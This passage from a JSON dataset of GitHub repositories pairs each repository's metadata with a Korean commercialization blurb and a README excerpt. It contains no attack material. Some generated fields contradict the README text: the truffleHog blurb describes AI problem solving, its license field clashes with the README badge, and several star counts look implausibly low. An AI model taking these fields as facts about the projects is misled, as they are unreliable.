downloads](https://badgen.net/jsdelivr/hits/gh/highlightjs/cdn-release?label=jsDelivr+CDN&color=purple)](https://www.jsdelivr.com/package/gh/highlightjs/cdn-release)\n\n[![ci status](https://badgen.net/github/checks/highlightjs/highlight.js/main?label=build)](https://github.com/highlightjs/highlight.js/actions","composite_score":0.2325,"license_safety_tag":"safe"},{"name":"nock/nock","github_url":"https://github.com/nock/nock","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# nock/nock 저장소 분석\n\n## 왜 보물인가\n인터넷 통신을 흉내내는 테스트 도구로, 소프트웨어 개발자들이 외부 서비스 없이도 안정적으로 코드를 검증할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발팀이 외부 API 연동 없이 자체 서비스를 테스트할 수 있는 개발 도구 판매\n2. **내부 업무 도구**: 기업의 ","readme_excerpt":"# Nock\n\n[![npm](https://img.shields.io/npm/v/nock.svg)][npmjs]\n![Coverage Status](http://img.shields.io/badge/coverage-100%25-brightgreen.svg)\n[![Backers on Open Collective](https://opencollective.com/nock/backers/badge.svg)](#backers)\n[![Sponsors on Open Collective](https://opencollective.com/nock/sponsors/badge.svg)](#sponsors)\n\n[npmjs]: https://www.npmjs.com/package/nock\n\nHTTP server mocking and expectations library for Node.js\n\nNock can be used to test modules that perform HTTP requests in isolation.\n\nFor instance, if a module performs HTTP requests to a CouchDB server or makes HTTP requests to the Amazon API, you can test that module in isolation.\n\n**Table of Contents**\n\n<!-- toc -->\n\n- [How does it work?](#how-does-it-work)\n- [Install](#install)\n  - [Node version support](#node-version-support)\n- [Usage](#usage)\n  - [READ THIS! - About interceptors](#read-this---about-interceptors)\n  - [Specifying hostname](#specifying-hostname)\n  - [Specifying path](#specifying-path)\n  - [Specif","composite_score":0.2324,"license_safety_tag":"safe"},{"name":"denaro-coin/denaro","github_url":"https://github.com/denaro-coin/denaro","stars":19,"language":"Python","license":"AGPL-3.0","abandonment_months":12,"description":"# Denaro Coin 저장소 분석\n\n## 왜 보물인가\n누구나 자신의 디지털 화폐를 만들고 관리할 수 있는 오픈소스 플랫폼으로, 기술 진입장벽 없이 블록체인 기반 금융 서비스를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 기업이나 커뮤니티가 자체 암호화폐를 발행·관리하는 클라우드 플랫폼으로 제공\n2. **내부 업무 ","readme_excerpt":"# Denaro\n**Denaro**, 'money' in Italian, is a cryptocurrency developed entirely in Python and utilizes PostgreSQL for it's blockchain.\n\n* **Features**: \n  * Maximum supply of 30,062,005 coins.\n  * Allows for transactions with up to 6 decimal places.\n  * Blocks are generated approximately every ~3 minutes, with a limit of 2MB per block.\n  * Given an average transaction size of 250 bytes (comprising of 5 inputs and 2 outputs), a single block can accommodate approximately ~8300 transactions, which translates to about ~40 transactions per second.\n\n## Denaro Projects\n* [Denaro Wallet Client GUI](https://github.com/The-Sycorax/DenaroWalletClient-GUI)\n* [Denaro Wallet Client CLI](https://github.com/The-Sycorax/DenaroWalletClient)\n* [Denaro CUDA Pool miner](https://github.com/1460293896/denaro-cuda-miner)\n* [DenaroCudaMiner (Solo)](https://github.com/witer33/denarocudaminer)\n* [Denaro WASM Miner](https://github.com/geiccobs/denaro-wasm-miner)\n* [Denaro CPU Pool Miner](https://github.com/geicco","composite_score":0.2323,"license_safety_tag":"risky"},{"name":"espressif/esp-tflite-micro","github_url":"https://github.com/espressif/esp-tflite-micro","stars":638,"language":"C++","license":"Apache-2.0","abandonment_months":1,"description":"# esp-tflite-micro 기술 평가\n\n## 왜 보물인가\n작은 전자기기(스마트폰, 시계, IoT 센서 등)에서도 인공지능을 직접 실행할 수 있게 해주는 핵심 기술로, 클라우드 전송 없이 오프라인에서 빠르고 안전하게 작동합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 스마트 가전 제어 서비스**\n세탁기·냉장고·에어컨 같은 가전제품에 내장되어 음성 명령을","readme_excerpt":"# TensorFlow Lite Micro for Espressif Chipsets\n\n[![Component Registry](https://components.espressif.com/components/espressif/esp-tflite-micro/badge.svg)](https://components.espressif.com/components/espressif/esp-tflite-micro)\n\n- As per TFLite Micro guidelines for vendor support, this repository has the `esp-tflite-micro` component and the examples needed to use Tensorflow Lite Micro on Espressif Chipsets (e.g., ESP32-P4) using ESP-IDF platform.\n- The base repo on which this is based can be found [here.](https://github.com/tensorflow/tflite-micro)\n\n## Build Status\n\n|   Build Type  |  Status    |\n| -----------   |  --------- |\n| Examples Build | [![CI](https://github.com/espressif/esp-tflite-micro/actions/workflows/ci.yml/badge.svg)](https://github.com/espressif/esp-tflite-micro/actions/workflows/ci.yml)\n\n### Quick Flash (Board-Specific)\n\n| Board | Example | Flash |\n|-------|---------|-------|\n| <img src=\"https://raw.githubusercontent.com/espressif/esp-who/master/docs/_static/get-started","composite_score":0.2322,"license_safety_tag":"safe"},{"name":"microsoft/MMdnn","github_url":"https://github.com/microsoft/MMdnn","stars":5,"language":"Python","license":"MIT","abandonment_months":10,"description":"# MMdnn 저장소 분석\n\n## 왜 보물인가\n서로 다른 AI 모델들을 쉽게 변환하고 호환시켜주는 도구로, AI 개발 비용과 시간을 대폭 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: AI 모델 변환 웹서비스 - 기업들이 자신의 AI 모델을 다양한 형식으로 변환할 수 있는 온라인 플랫폼\n2. **내부 업무 도구**: 대형 I","readme_excerpt":"# ![MMdnn](https://ndqzpq.dm2304.livefilestore.com/y4mF9ON1vKrSy0ew9dM3Fw6KAvLzQza2nL9JiMSIfgfKLbqJPvuxwOC2VIur_Ycz4TvVpkibMkvKXrX-N9QOkyh0AaUW4qhWDak8cyM0UoLLxc57apyhfDaxflLlZrGqiJgzn1ztsxiaZMzglaIMhoo8kjPuZ5-vY7yoWXqJuhC1BDHOwgNPwIgzpxV1H4k1oQzmewThpAJ_w_fUHzianZtMw?width=35&height=35&cropmode=none) MMdnn\n\n[![PyPi Version](https://img.shields.io/pypi/v/mmdnn.svg)](https://pypi.org/project/mmdnn/)\n[![License](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE)\n[![Linux](https://travis-ci.org/Microsoft/MMdnn.svg?branch=master)](https://travis-ci.org/Microsoft/MMdnn)\n\nMMdnn is a comprehensive and cross-framework tool to convert, visualize and diagnose deep learning (DL) models.\nThe \"MM\" stands for model management, and \"dnn\" is the acronym of deep neural network.\n\nMajor features include:\n\n- <a href=\"#conversion\">**Model Conversion**</a>\n\n  - We implement a universal converter to convert DL models between frameworks, which means you can train a model with one framework and deplo","composite_score":0.2322,"license_safety_tag":"safe"},{"name":"public-awesome/cw-nfts","github_url":"https://github.com/public-awesome/cw-nfts","stars":201,"language":"Rust","license":"Apache-2.0","abandonment_months":2,"description":"","readme_excerpt":"","composite_score":0.2322,"license_safety_tag":"safe"},{"name":"awslabs/djl","github_url":"https://github.com/awslabs/djl","stars":26,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"\n![DeepJavaLibrary](website/img/deepjavalibrary.png?raw=true \"Deep Java Library\")\n\n[![Release](https://img.shields.io/github/v/release/deepjavalibrary/djl.svg)](https://github.com/deepjavalibrary/djl/releases)\n[![Docs](https://img.shields.io/badge/docs-up-green)](https://docs.djl.ai/master/index.html)\n[![Continuous](https://github.com/deepjavalibrary/djl/workflows/Continuous/badge.svg)](https://github.com/deepjavalibrary/djl/actions/workflows/continuous.yml)\n[![Nightly Publish](https://github.com/deepjavalibrary/djl/workflows/Nightly%20Publish/badge.svg)](https://github.com/deepjavalibrary/djl/actions/workflows/nightly_publish.yml)\n[![CodeQL](https://github.com/deepjavalibrary/djl/actions/workflows/codeql-analysis-java.yml/badge.svg)](https://github.com/deepjavalibrary/djl/actions/workflows/codeql-analysis-java.yml)\n\n# Deep Java Library (DJL)\n\n## Overview\n\n[Deep Java Library (DJL)](https://docs.djl.ai/master/index.html) is an open-source, high-level, engine-agnostic Java framework for ","composite_score":0.2321,"license_safety_tag":"safe"},{"name":"waylybaye/XcodeCleaner-SwiftUI","github_url":"https://github.com/waylybaye/XcodeCleaner-SwiftUI","stars":37,"language":"Swift","license":"unknown","abandonment_months":11,"description":"# XcodeCleaner-SwiftUI 분석 보고서\n\n## 왜 보물인가\nMac에 쌓인 불필요한 개발 파일들을 자동으로 정리해서 저장공간을 확보해주는 유용한 청소 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독형 Mac 최적화 앱으로 월 이용료를 받으며 자동 정리 기능 제공\n2. **내부 업무 도구**: 개발 회사에서 직원들의 컴","readme_excerpt":"# Cleaner for Xcode\n\nThis is the new `SwiftUI` version of my original `react-native-macos` powered [XcodeCleaner](https://github.com/waylybaye/XcodeCleaner)\n\n----\n\n![screenshot](./screenshot.png)\n\nThis app helps you to make your Xcode faster by removing unwanted and deprecated files. You can run cleaner weekly or monthly to keep your developer folder health and to save more disk space.\n\n\n这个应用可以帮助你清除遗留以及废弃文件，从而极大的节省硬盘空间. 你可以每月或者每周运行一次进行清理。\n\n\n\n## Download\n\nCleaner for Xcode is available on Mac App Store. You can also build it by yourself, please refer to `Build` section.\n\n[![Download on Mac App Store](https://tools.applemediaservices.com/api/badges/download-on-the-mac-app-store/white/en-US \"Download on Mac App Store\")\n](https://itunes.apple.com/app/cleaner-for-xcode/id1296084683)\n\n\n## Build\n\nopen `Cleaner4Xcode.xcodeproj` and hit `⌘ R` !\n\n\n## LICENSE\n\nYou are permitted to use this\nsource code, with or without modification, in source or binary form, on\nyour devices however you see fit.  Y","composite_score":0.2321,"license_safety_tag":"unknown"},{"name":"coreos/bbolt","github_url":"https://github.com/coreos/bbolt","stars":7,"language":"Go","license":"MIT","abandonment_months":0,"description":"# bbolt 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 데이터를 빠르고 안전하게 저장하고 찾을 수 있도록 도와주는 핵심 기술로, 많은 업체에서 필수적으로 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 실시간 설정 저장이 필요한 협업 도구나 프로젝트 관리 플랫폼의 데이터 저장소\n2. **내부 업무 도구**: 회사 직원들이 사용하","readme_excerpt":"bbolt\n=====\n\n[![Go Report Card](https://goreportcard.com/badge/go.etcd.io/bbolt?style=flat-square)](https://goreportcard.com/report/go.etcd.io/bbolt)\n[![Go Reference](https://pkg.go.dev/badge/go.etcd.io/bbolt.svg)](https://pkg.go.dev/go.etcd.io/bbolt)\n[![Releases](https://img.shields.io/github/release/etcd-io/bbolt/all.svg?style=flat-square)](https://github.com/etcd-io/bbolt/releases)\n[![LICENSE](https://img.shields.io/github/license/etcd-io/bbolt.svg?style=flat-square)](https://github.com/etcd-io/bbolt/blob/master/LICENSE)\n\nbbolt is a fork of [Ben Johnson's][gh_ben] [Bolt][bolt] key/value\nstore. The purpose of this fork is to provide the Go community with an active\nmaintenance and development target for Bolt; the goal is improved reliability\nand stability. bbolt includes bug fixes, performance enhancements, and features\nnot found in Bolt while preserving backwards compatibility with the Bolt API.\n\nBolt is a pure Go key/value store inspired by [Howard Chu's][hyc_symas]\n[LMDB project][l","composite_score":0.2318,"license_safety_tag":"safe"},{"name":"qTox/qTox","github_url":"https://github.com/qTox/qTox","stars":7,"language":"C++","license":"gpl-3.0","abandonment_months":15,"description":"# qTox/qTox 분석 보고서\n\n## 왜 보물인가\n누구나 무료로 안전하게 메시지와 영상통화를 할 수 있는 개인 소유의 채팅 앱으로, 대형 기술 회사에 의존하지 않으려는 사람들에게 매력적입니다.\n\n## 어디에 쓸 수 있나\n- **기업용 SaaS**: 보안이 중요한 금융, 의료, 법률 회사를 위한 내부 커뮤니케이션 플랫폼\n- **내부 업무 도구**: 개인정","readme_excerpt":"# This repository and qTox are unmaintained!\n\nDue to a lack of resources, this repository of qTox is no longer maintained.\n\nThere is an active fork of qTox at [TokTok/qTox](https://github.com/TokTok/qTox)\nwhich I recommend for future releases.\n\nI want to take the time and thank all\n[contributors](https://github.com/qTox/qTox/graphs/contributors) and\nespecially the long term contributors and founders:\n\n- [anthonybilinski](https://github.com/anthonybilinski)\n- [Diadlo](https://github.com/Diadlo)\n- [iphydf](https://github.com/iphydf)\n- [nurupo](https://github.com/nurupo)\n- [tux3](https://github.com/tux3)\n- [zetok](https://github.com/zetok)\n\nIt was fun working with all of you and I learned a lot!\n\n`So long, and thanks for all the fish!` - [sudden6](https://github.com/sudden6)\n\n\n<a name=\"qtox\" />\n\n<p align=\"center\">\n<img src=\"https://qtox.github.io/assets/imgs/logo_head.png\" alt=\"qTox\" />\n</p>\n\n---\n\n<p align=\"center\">\n<a href=\"https://github.com/qTox/qTox/blob/master/LICENSE\">\n<img src=\"htt","composite_score":0.2316,"license_safety_tag":"restricted"},{"name":"LuckDraw/lucky-canvas","github_url":"https://github.com/LuckDraw/lucky-canvas","stars":7,"language":"TypeScript","license":"Apache-2.0","abandonment_months":10,"description":"# LuckDraw/lucky-canvas 분석\n\n## 왜 보물인가\n복권이나 추첨 같은 게임을 웹사이트에 쉽게 만들 수 있는 도구라서, 이벤트 회사나 온라인 쇼핑몰이 고객을 모으는 데 바로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 카지노나 게임 플랫폼을 운영하는 회사가 월 구독료를 받고 이 기술을 임대해주는 서","readme_excerpt":"\n<div align=\"center\">\n  <img src=\"https://unpkg.com/buuing@0.0.1/imgs/lucky-canvas.png\" width=\"128\" alt=\"logo\" />\n  <h1>lucky-canvas 抽奖插件</h1>\n  <p>一个基于 JavaScript 的跨平台 ( 大转盘 / 九宫格 / 老虎机 ) 抽奖插件</p>\n  <p>\n    <a href=\"https://github.com/buuing/lucky-canvas/stargazers\" target=\"_black\">\n      <img src=\"https://img.shields.io/github/stars/buuing/lucky-canvas?color=%23ffba15&logo=github&style=flat-square\" alt=\"stars\" />\n    </a>\n    <a href=\"https://github.com/buuing/lucky-canvas/network/members\" target=\"_black\">\n      <img src=\"https://img.shields.io/github/forks/buuing/lucky-canvas?color=%23ffba15&logo=github&style=flat-square\" alt=\"forks\" />\n    </a>\n    <a href=\"https://github.com/buuing\" target=\"_black\">\n      <img src=\"https://img.shields.io/badge/Author-%20buuing%20-7289da.svg?&logo=github&style=flat-square\" alt=\"author\" />\n    </a>\n    <a href=\"https://github.com/buuing/lucky-canvas/blob/master/LICENSE\" target=\"_black\">\n      <img src=\"https://img.shields.io/github/license/buuing/lu","composite_score":0.2315,"license_safety_tag":"safe"},{"name":"thoughtbot/factory_bot_rails","github_url":"https://github.com/thoughtbot/factory_bot_rails","stars":5,"language":"Ruby","license":"MIT","abandonment_months":2,"description":"# factory_bot_rails 상용화 분석\n\n## 왜 보물인가\n소프트웨어 개발자들이 테스트 코드를 빠르고 쉽게 만들 수 있도록 돕는 도구로, 개발 생산성을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n개발팀이 있는 스타트업이나 기업에 클라우드 기반 테스트 관리 플랫폼으로 제공 (개발 과정 자동화)\n\n**2. 내부 업무 ","readme_excerpt":"# factory_bot_rails [![Code Climate][grade-image]][grade] [![Gem Version][version-image]][version]\n\n[factory_bot][fb] is a fixtures replacement with a straightforward definition\nsyntax, support for multiple build strategies (saved instances, unsaved\ninstances, attribute hashes, and stubbed objects), and support for multiple\nfactories for the same class (`user`, `admin_user`, and so on), including factory\ninheritance.\n\n### Transitioning from factory\\_girl\\_rails?\n\nCheck out the [guide](https://github.com/thoughtbot/factory_bot/blob/4-9-0-stable/UPGRADE_FROM_FACTORY_GIRL.md).\n\n## Rails\n\nfactory\\_bot\\_rails provides Rails integration for [factory_bot][fb].\n\nSupported Rails versions are listed in [`Appraisals`](Appraisals). Supported\nRuby versions are listed in [`.github/workflows/build.yml`](.github/workflows/build.yml).\n\n## Download\n\nGithub: http://github.com/thoughtbot/factory_bot_rails\n\nGem:\n\n    $ gem install factory_bot_rails\n\n## Configuration\n\nAdd `factory_bot_rails` to your Gemfile","composite_score":0.2315,"license_safety_tag":"safe"},{"name":"ImaginativeShohag/Oops-No-Internet","github_url":"https://github.com/ImaginativeShohag/Oops-No-Internet","stars":6,"language":"Kotlin","license":"Apache-2.0","abandonment_months":11,"description":"# Oops-No-Internet 저장소 분석\n\n## 왜 보물인가\n인터넷이 끊겨도 앱이 정상 작동하도록 만드는 기술로, 모든 모바일 앱 개발자들이 필요로 하는 핵심 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **배달 앱 오프라인 주문**: 지하철·터널 구간에서도 주문 저장 후 인터넷 복구 시 자동 전송하는 서비스\n2. **금융 앱 내부 도구**: 증권사","readme_excerpt":"# Oops! No Internet!\n\nSimple no Internet dialogs and snackbar, which will automatically appear and disappear based on Internet connectivity status.\n\n[![Developer](https://img.shields.io/badge/Maintainer-ImaginativeShohag-green)](https://github.com/ImaginativeShohag)\n[![GitHub release](https://img.shields.io/github/release/ImaginativeShohag/Oops-No-Internet.svg)](https://github.com/ImaginativeShohag/Oops-No-Internet/releases)\n[![Android Arsenal]( https://img.shields.io/badge/Android%20Arsenal-Oops!%20No%20Internet!-green.svg?style=flat)]( https://android-arsenal.com/details/1/8005 )\n[![API](https://img.shields.io/badge/API-21%2B-brightgreen.svg?style=flat)](https://android-arsenal.com/api?level=21)\n\n## Previews\n\n### Preview of `NoInternetDialogSignal`:\n\n|                           Day Mode                           |                   Day Mode (Airplane Mode)                   |                          Night Mode                          |\n| :-------------------------------------------","composite_score":0.231,"license_safety_tag":"safe"},{"name":"manojpramesh/solidity-cheatsheet","github_url":"https://github.com/manojpramesh/solidity-cheatsheet","stars":11,"language":"","license":"MIT","abandonment_months":2,"description":"# Solidity 치트시트 분석\n\n## 왜 보물인가\n블록체인 프로그래밍을 배우려는 초보자들이 복잡한 문법을 한눈에 찾아볼 수 있는 빠른 참고서입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 블록체인 개발자 교육 플랫폼에 내장하여 구독자들에게 즉시 코드 레퍼런스 제공\n2. **내부 업무 도구**: 암호화폐 거래소나 블록체인 회사의 개발팀","readme_excerpt":"# Solidity Cheatsheet and Best practices\n\n## Motivation\n\nThis document is a cheatsheet for **Solidity** that you can use to write **Smart Contracts** for **Ethereum** based blockchain.\n\nThis guide is not intended to teach you Solidity from the ground up, but to help developers with basic knowledge who may struggle to get familiar with Smart Contracts and Blockchain because of the Solidity concepts used.\n\n> Older versions of this cheatsheet can be found in Git tags.\n\n\n## Table of contents\n\n- [Solidity Cheatsheet and Best practices](#solidity-cheatsheet-and-best-practices)\n  * [Motivation](#motivation)\n  * [Table of contents](#table-of-contents)\n  * [Version pragma](#version-pragma)\n  * [Import files](#import-files)\n  * [Types](#types)\n    + [Boolean](#boolean)\n    + [Integer](#integer)\n      - [Unchecked arithmetic](#unchecked-arithmetic)\n    + [Address](#address)\n      - [balance](#balance)\n      - [transfer and send](#transfer-and-send)\n      - [call](#call)\n      - [delegatecall](#de","composite_score":0.2307,"license_safety_tag":"safe"},{"name":"MichalLytek/type-graphql","github_url":"https://github.com/MichalLytek/type-graphql","stars":24,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"<!-- prettier-ignore-start -->\n<!-- markdownlint-disable-next-line MD041 -->\n![logo](./images/logo.png)\n<!-- prettier-ignore-end -->\n\n# TypeGraphQL\n\n[![release](https://github.com/MichalLytek/type-graphql/actions/workflows/release.yml/badge.svg)](https://github.com/MichalLytek/type-graphql/actions/workflows/release.yml)\n[![website](https://github.com/MichalLytek/type-graphql/actions/workflows/website.yml/badge.svg)](https://github.com/MichalLytek/type-graphql/actions/workflows/website.yml)\n[![codeql](https://github.com/MichalLytek/type-graphql/actions/workflows/codeql.yml/badge.svg)](https://github.com/MichalLytek/type-graphql/actions/workflows/codeql.yml)\n[![discord](https://img.shields.io/discord/1195751245386875040?logo=discord&color=%237289da)](https://discord.gg/cWnBAQcbg2)\n[![codecov](https://codecov.io/gh/MichalLytek/type-graphql/branch/master/graph/badge.svg)](https://codecov.io/gh/MichalLytek/type-graphql)\n[![npm](https://img.shields.io/npm/v/type-graphql?logo=npm&color=%23CC3","composite_score":0.2303,"license_safety_tag":"safe"},{"name":"walkor/Workerman","github_url":"https://github.com/walkor/Workerman","stars":5,"language":"PHP","license":"mit","abandonment_months":1,"description":"# Workerman 사업화 분석\n\n## 왜 보물인가\n웹사이트가 많은 사용자를 동시에 처리할 때 느려지지 않도록 해주는 기술로, 온라인 서비스의 안정성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 채팅 SaaS**: 수천 명이 동시에 메시지를 주고받을 수 있는 채팅 플랫폼 구축\n2. **게임 서버 API**: 온라인 게임의 여러 플","readme_excerpt":"# Workerman\n[![Gitter](https://badges.gitter.im/walkor/Workerman.svg)](https://gitter.im/walkor/Workerman?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=body_badge)\n[![Latest Stable Version](https://poser.pugx.org/workerman/workerman/v/stable)](https://packagist.org/packages/workerman/workerman)\n[![Total Downloads](https://poser.pugx.org/workerman/workerman/downloads)](https://packagist.org/packages/workerman/workerman)\n[![Monthly Downloads](https://poser.pugx.org/workerman/workerman/d/monthly)](https://packagist.org/packages/workerman/workerman)\n[![Daily Downloads](https://poser.pugx.org/workerman/workerman/d/daily)](https://packagist.org/packages/workerman/workerman)\n[![License](https://poser.pugx.org/workerman/workerman/license)](https://packagist.org/packages/workerman/workerman)\n\n## What is it\nWorkerman is an asynchronous event-driven PHP framework with high performance to build fast and scalable network applications. It supports HTTP, WebSocket, custom protoc","composite_score":0.2302,"license_safety_tag":"safe"},{"name":"michidk/rost","github_url":"https://github.com/michidk/rost","stars":6,"language":"Rust","license":"unknown","abandonment_months":11,"description":"# michidk/rost 프로젝트 분석\n\n## 왜 보물인가\n프로젝트 정보가 매우 제한적(설명 없음, 라이선스 미상, 6개 스타)이어서 현재로서는 그 가치를 평가하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n저장소 설명이 없어 구체적인 용도를 파악하기 어렵습니다. 저장소명 \"rost\"의 의미를 확인한 후 다음 시나리오를 검토해야 합니다:\n- 데이터 변환/처리","readme_excerpt":"# rost\n\n<p align=\"center\"><img src=\"logo.jpg\" alt=\"Rust German Logo\"></p>\n\nAren't you _müde_ from writing Rust programs in English? Do you like saying\n\"scheiße\" a lot? Would you like to try something different, in an exotic and\nfunny-sounding language? Would you want to bring some German touch to your\nprograms?\n\n**rost** (German for _Rust_) is here to save your day, as it allows you to\nwrite Rust programs in German, using German keywords, German function names,\nGerman idioms.\n\nYou don't feel at ease using only German words? Don't worry!\nGerman Rust is fully compatible with English-Rust, so you can mix both at your\nconvenience.\n\nHere's an example of what can be achieved with Rost:\n\n## struct and impl (aka Konvention und Umsetzung)\n\n```rust\nrost::rost! {\n    benutze std::sammlungen::Wörterbuch als Wöbu;\n\n    eigenschaft SchlüsselWert {\n        fk schreibe(&selbst, schlsl: Zeichenkette, wert: Zeichenkette);\n        fk lese(&selbst, schlsl: Zeichenkette) -> Ergebnis<Möglichkeit<&Zeichenket","composite_score":0.23,"license_safety_tag":"unknown"},{"name":"jacking75/edu_cpp_IOCP","github_url":"https://github.com/jacking75/edu_cpp_IOCP","stars":11,"language":"C++","license":"MIT","abandonment_months":2,"description":"","readme_excerpt":"# 단계 별로 IOCP 실습\n- 코드에 버그가 있을 수 있다.(버그를 잡는 것도 공부!)    \n- Modern C++을 적극적으로 사용하는 것을 추천한다.  \n- 'Tutorial/ChatServerWithLogger' 있는 프로젝트는 채팅 서버에 plog 라이브러리를 사용하고 있으며, Windows Event Log에 로그 데이터를 기록할 수 있다.     \n- Visual Studio 2022를 사용한다(하위 버전으로 변경해도 코드 변경은 없다)\n- [YOUTUBE](https://www.youtube.com/watch?v=RMRsvll7hrM&list=PLW_xyUw4fSdbYjgwC-JCCFWznhayrZv77 )  \n- [학습 가이드](./iocp_learning_guide.md)  \n  \n**학습에 AI를 활용하면 아주 효율적으로 학습할 수 있으니 꼭 활용하기 바랍니다. 여기에 있는 코드를 AI에게 질문할 때 첨부시켜서 궁금한 것을 마음껏 물어보기 바랍니다. 다만 배우는 단계에서는 AI에게 코딩을 맡기는 것은 피하는 것이 좋습니다.**    \n    \n<br>  \n  \n  \n## 실습 단계\n실습을 하기 전에 꼭 IOCP에 대해 학습을 한다.  \nIOCP는 오래된 기술로 서적에서 다루기도 했고, 특히 네이버에서 검색해도 많은 자료를 찾을 수 있다(네이버 검색하면 한글 자료)     \n- 1 단계. 가장 간단한 IOCP 서버. Echo 서버 코드 만들기  \n    - IOCP API 동작에 대해서 이해할 수 있다.\n- 2 단계. OverlappedEx 구조체에 있는 `char m_szBuf[ MAX_SOCKBUF ]`를 stClientInfo 구조체로 이동 및 코드 분리하기\n    - 앞 단계에는 OverlappedEx 구조체에 `m_szBuf`가 있어서 불 필요한 메모리 낭비가 발생함\n- 3 단계. 애플리케이션과 네트워크 코드 분리하기  \n    - IOCP를 네트워크 라이브러리화 하기 위해 네트워크와 서버 로직 코드를 분리한다.\n    - 연결, ","composite_score":0.2299,"license_safety_tag":"safe"},{"name":"TeamUltroid/Ultroid","github_url":"https://github.com/TeamUltroid/Ultroid","stars":6,"language":"Python","license":"AGPL-3.0","abandonment_months":2,"description":"# TeamUltroid/Ultroid 분석\n\n## 왜 보물인가\n메시징 앱을 자동으로 관리하고 확장할 수 있는 오픈소스 플랫폼으로, 대규모 커뮤니티 운영비용을 획기적으로 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 유튜버/인플루언서를 위한 자동 팬 관리 서비스 (팬 메시지 자동 응답, 커뮤니티 모니터링)\n2. **내부 업무","readme_excerpt":"<p align=\"center\">\n  <img src=\"./resources/extras/logo_readme.jpg\" alt=\"TeamUltroid Logo\">\n</p>\n<h1 align=\"center\">\n  <b>Ultroid - UserBot</b>\n</h1>\n\n<b>A stable pluggable Telegram userbot + Voice & Video Call music bot, based on Telethon.</b>\n\n[![](https://img.shields.io/badge/Ultroid-v0.8-crimson)](#)\n[![Stars](https://img.shields.io/github/stars/TeamUltroid/Ultroid?style=flat-square&color=yellow)](https://github.com/TeamUltroid/Ultroid/stargazers)\n[![Forks](https://img.shields.io/github/forks/TeamUltroid/Ultroid?style=flat-square&color=orange)](https://github.com/TeamUltroid/Ultroid/fork)\n[![Size](https://img.shields.io/github/repo-size/TeamUltroid/Ultroid?style=flat-square&color=green)](https://github.com/TeamUltroid/Ultroid/)   \n[![Python](https://img.shields.io/badge/Python-v3.10+-blue)](https://www.python.org/)\n[![CodeFactor](https://www.codefactor.io/repository/github/teamultroid/ultroid/badge/main)](https://www.codefactor.io/repository/github/teamultroid/ultroid/overview/main)","composite_score":0.2295,"license_safety_tag":"risky"},{"name":"github/feedback","github_url":"https://github.com/github/feedback","stars":14,"language":"Ruby","license":"CC-BY-4.0","abandonment_months":0,"description":"# github/feedback 저장소 분석\n\n## 왜 보물인가\n사용자 의견을 체계적으로 모으고 관리하는 도구로, 제품 개선에 필요한 고객 목소리를 효율적으로 수집할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소프트웨어 회사가 고객들의 기능 요청과 불만을 한곳에서 관리하는 피드백 포탈\n- **내부 업무 도구**: 대기업의 각 부서","readme_excerpt":"# GitHub Community Discussions\n\nIn this repository, you will find categories for various product areas. Feel free to share feedback, discuss topics with other community members, or ask questions.\n\n## Product Feedback\n\n| **Feedback Category** | **About the Product** \t|\n|---\t|---\t|\n| 👍 [Accessibility](https://github.com/orgs/community/discussions/categories/accessibility) | [About Accessibility](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-personal-account-on-github/managing-personal-account-settings/managing-accessibility-settings#about-accessibility-settings) |\n| 🚢 [Actions](https://github.com/orgs/community/discussions/categories/actions) | [GitHub Actions](https://github.com/features/actions) |\n| 🔗 [Apps, API and Webhooks](https://github.com/orgs/community/discussions/categories/apps-api-and-webhooks) | [GitHub Apps](https://docs.github.com/en/apps), [GitHub REST API](https://docs.github.com/en/rest), [GitHub GraphQL API](https://docs.github.com/en/grap","composite_score":0.2294,"license_safety_tag":"unknown"},{"name":"dxa4481/truffleHog","github_url":"https://github.com/dxa4481/truffleHog","stars":6,"language":"Go","license":"gpl-2.0","abandonment_months":0,"description":"# truffleHog 상용화 분석\n\n## 왜 보물인가\nAI가 자동으로 복잡한 문제를 단계별로 해결하고 검증하는 능력이 있어서, 보안 점검이나 데이터 검수 같은 반복적인 업무를 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: \"자동 보안 감시 플랫폼\" - 기업 코드에 숨겨진 비밀정보(암호, 토큰)를 자동으로 찾아주는 온라인","readme_excerpt":"<p align=\"center\">\n  <img alt=\"GoReleaser Logo\" src=\"https://storage.googleapis.com/trufflehog-static-sources/pixel_pig.png\" height=\"140\" />\n  <h2 align=\"center\">TruffleHog</h2>\n  <p align=\"center\">Find leaked credentials.</p>\n</p>\n\n---\n\n<div align=\"center\">\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/trufflesecurity/trufflehog/v3)](https://goreportcard.com/report/github.com/trufflesecurity/trufflehog/v3)\n[![License](https://img.shields.io/badge/license-AGPL--3.0-brightgreen)](/LICENSE)\n[![Total Detectors](https://img.shields.io/github/directory-file-count/trufflesecurity/truffleHog/pkg/detectors?label=Total%20Detectors&type=dir)](/pkg/detectors)\n\n</div>\n\n---\n\n# :mag_right: _Now Scanning_\n\n<div align=\"center\">\n\n<img src=\"assets/scanning_logos.svg\">\n\n**...and more**\n\nTo learn more about TruffleHog and its features and capabilities, visit our 